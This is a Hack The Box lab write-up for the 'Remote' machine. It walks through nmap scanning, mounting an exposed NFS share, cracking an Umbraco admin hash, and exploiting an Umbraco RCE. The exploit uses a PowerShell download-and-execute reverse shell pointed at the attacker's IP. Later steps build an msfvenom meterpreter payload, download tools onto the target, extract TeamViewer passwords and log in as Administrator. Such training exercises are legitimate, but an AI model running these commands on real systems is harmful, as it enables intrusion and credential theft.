#reconnaissance
| nmap
So, I start as default, with nmap.
[email protected]:~/Desktop/HTB/remote$ nmap -A -sV -sC -v -oN remote_nmap --min-rate=10000 10.10.10.180
A few seconds later I get a report:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
# Nmap 7.80 scan initiated Tue Jul 21 16:29:50 2020 as: nmap -A -sV -sC -v -oN remote_nmap --min-rate=10000 10.10.10.180 Nmap scan report for remote.htb (10.10.10.180) Host is up (0.064s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Home - Acme Widgets 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 5m08s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-07-21T20:35:54 |_ start_date: N/A Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jul 21 16:31:56 2020 -- 1 IP address (1 host up) scanned in 125.40 seconds |
Many intresting things, I assume. But at first, I’ll research port 80.
Making host entries: sudo vi /etc/hosts. Btw, I offer alias to you for make this more fast:
|
1 |
{ echo "" ; echo "#alias for hosts" ; echo "alias hosts='sudo vi /etc/hosts'"; } >>~/.bashrc |
#enumeration
| web
When I researching remote.htb/contact, I find few interesting things.
First, we define the Umbraco CMS by footer. Second, probably we have login page to the admin area by click on the button.
I haven’t been able to find anything else interesting yet. Let’s put this aside for now, and pay attention to rpcbind service from the previous nmap report.
| nfs
I assume what need try nmap script to get more things from that rpcbind.
[email protected]:~/Desktop/HTB/remote$ nmap -sV --script=nfs-showmount -oN remote.nfs --min-rate=10000 remote.htb
And I get second nmap report:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
Nmap 7.80 scan initiated Tue Jul 21 18:53:20 2020 as: nmap -sV --script=nfs-showmount -oN remote.nfs --min-rate=10000 remote.htb Nmap scan report for remote.htb (10.10.10.180) Host is up (0.081s latency). Not shown: 976 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 111/tcp open rpcbind 2-4 (RPC #100000) | nfs-showmount: |_ /site_backups | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 514/tcp filtered shell 992/tcp filtered telnets 1066/tcp filtered fpo-fns 1169/tcp filtered tripwire 1434/tcp filtered ms-sql-m 2049/tcp open mountd 1-3 (RPC #100005) | nfs-showmount: |_ /site_backups 3168/tcp filtered poweronnud 3546/tcp filtered unknown 3690/tcp filtered svn 5033/tcp filtered jtnetd-server 7625/tcp filtered unknown 9010/tcp filtered sdr 10000/tcp filtered snet-sensor-mgmt 10009/tcp filtered swdtp-sv 14238/tcp filtered unknown 32770/tcp filtered sometimes-rpc3 50003/tcp filtered unknown 61532/tcp filtered unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done at Tue Jul 21 18:55:37 2020 -- 1 IP address (1 host up) scanned in 137.50 seconds |
So I saw site_backups directory, lets try mount it:
[email protected]:~/Desktop/HTB/remote$ sudo mount -t nfs remote.htb:/site_backups /mnt
And I got it.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
kali@kali:~/Desktop/HTB/remote$ ls -la /mnt total 159 drwx------ 2 4294967294 4294967294 4096 Feb 23 13:35 . drwxr-xr-x 19 root root 36864 Jul 14 18:04 .. drwx------ 2 4294967294 4294967294 64 Feb 20 12:16 App_Browsers drwx------ 2 4294967294 4294967294 4096 Feb 20 12:17 App_Data drwx------ 2 4294967294 4294967294 4096 Feb 20 12:16 App_Plugins drwx------ 2 4294967294 4294967294 64 Feb 20 12:16 aspnet_client drwx------ 2 4294967294 4294967294 49152 Feb 20 12:16 bin drwx------ 2 4294967294 4294967294 8192 Feb 20 12:16 Config drwx------ 2 4294967294 4294967294 64 Feb 20 12:16 css -rwx------ 1 4294967294 4294967294 152 Nov 1 2018 default.aspx -rwx------ 1 4294967294 4294967294 89 Nov 1 2018 Global.asax drwx------ 2 4294967294 4294967294 4096 Feb 20 12:16 Media drwx------ 2 4294967294 4294967294 64 Feb 20 12:16 scripts drwx------ 2 4294967294 4294967294 8192 Feb 20 12:16 Umbraco drwx------ 2 4294967294 4294967294 4096 Feb 20 12:16 Umbraco_Client drwx------ 2 4294967294 4294967294 4096 Feb 20 12:16 Views -rwx------ 1 4294967294 4294967294 28539 Feb 20 00:57 Web.config |
After spending a little time on Google for studying Umbraco CMS, I pulls bits of text (aka strings) from Umbraco.sdf:
[email protected]:/mnt/App_Data$ strings Umbraco.sdf | grep admin
In the output found hash:
|
1 |
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50 |
And decrypt him.
|
1 2 3 4 5 |
kali@kali:~/Desktop/HTB/remote$ sudo john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt ... kali@kali:~/Desktop/HTB/remote$ sudo john hash.txt --show ?:baconandcheese 1 password hash cracked, 0 left |
Now I know password – baconandcheese.
#exploitation
| umbraco-rce
Btw. While I studyed Umbraco CMS, I found cve for him. I think, it time for using it. I will download exploit and simple PS reverse shell in addition.
|
1 2 3 |
wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py wget https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1 chmod 775 exploit.py |
Starting msfconsole in terminal, and configure:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload payload/windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.19.30
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > exploit -j
Where 10.10.19.30 is my IP.
Also need start HTTP-server, it very simple in second terminal:
[email protected]:~/Desktop/HTB/remote$ sudo python3 -m http.server 80
Then need configure mini-reverse.ps1 with change ip and port.
$socket = new-object System.Net.Sockets.TcpClient('10.10.19.30', 4444);
and now I starting in 3st terminal exploit with payload:
[email protected]:~/Desktop/HTB/remote$ sudo python3 exploit.py -u [email protected] -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.19.30/mini-reverse.ps1')"
After this work I getting user.txt in msfconsole.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
msf5 exploit(multi/handler) > sessions Active sessions Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows 10.10.19.30:4444 -> 10.10.10.180:49758 (10.10.10.180) msf5 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1… whoami iis apppool\defaultapppool type c:\users\Public\user.txt e15b9fd6e3d84aa519946424f7bf9bf9 |
#privilege escalation
Let’s download winPEAS – for enumeration,
[email protected]:~/Desktop/HTB/remote$ wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe
and generate meterpreter‘s shell for comfortable work:
[email protected]:~/Desktop/HTB/remote$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.30 LPORT=4444 -f exe > meterpreter.exe
Download this on server in my msfconsole session:
powershell Invoke-WebRequest -URI http://10.10.19.30/winPEAS.exe -outfile C:\Users\Public\winPEAS.exe
powershell Invoke-WebRequest -URI http://10.10.19.30/meterpreter.exe -outfile C:\Users\Public\meterpreter.exe
Now I need reconfigure msfconsole for meterpreter,
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.19.30
msf5 exploit(multi/handler) > exploit
meterpreter > shell
and start winPEAS.
C:\windows\system32\inetsrv> C:/Users/Public/winPEAS.exe
| teamviewer
In output of winPEAS I see this tasty gift:
|
1 2 3 |
================================================================================================= TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running TeamViewer Remote Software ================================================================================================= |
So, it is time to extract passwords:
|
1 2 3 4 5 |
C:\windows\system32\inetsrv>exit exit meterpreter > run post/windows/gather/credentials/teamviewer_passwords [*] Finding TeamViewer Passwords on REMOTE [+] Found Unattended Password: !R3m0te! |
Last step – connect to server with evil-winrm, and receive root.txt.
|
1 2 3 4 5 |
kali@kali:~/Desktop/HTB/remote$ evil-winrm -u Administrator -p '!R3m0te!' -i 10.10.10.180 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint <em>Evil-WinRM</em> PS C:\Users\Administrator\Documents> cat C:\Users\Administrator\Desktop\root.txt 61adf694bd7966ae13050b988e91c585 |
Comments